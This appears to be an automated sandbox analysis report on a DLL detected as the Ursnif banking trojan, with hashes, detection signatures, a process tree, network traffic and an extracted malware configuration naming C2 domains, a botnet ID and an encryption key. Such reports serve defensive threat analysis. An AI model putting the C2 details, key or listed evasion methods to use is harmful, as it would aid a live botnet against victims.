Loading ...

Play interactive tourEdit tour

Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name:616412739e268.dll
Analysis ID:500413
MD5:9e67e68ddbedba865b91b5469ab642ef
SHA1:f2c7b0735343081be06e48616d0fc14235a28744
SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags:brtdllgoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7036 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7052 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1364 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.rundll32.exe.8aa31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.322a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                5.3.rundll32.exe.2eca31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  5.3.rundll32.exe.2eca31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.342a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 18 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.880000220.0000000004643000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbJv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbvv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb: source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbnv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbE source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbO{ source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbQt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbr source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbLy source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbby source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbXv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbx source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbQ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbet source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbst source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: wsspicli.pdbWt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbw source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbCt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.879269729.0000000000684000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb]t source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbbv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbhv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbpv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbI source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbOt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdbIt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbkt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb|v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdb^v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbEm5 source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb&v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbyt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb,v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891777281.00000000009AC000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdbC source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbRv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
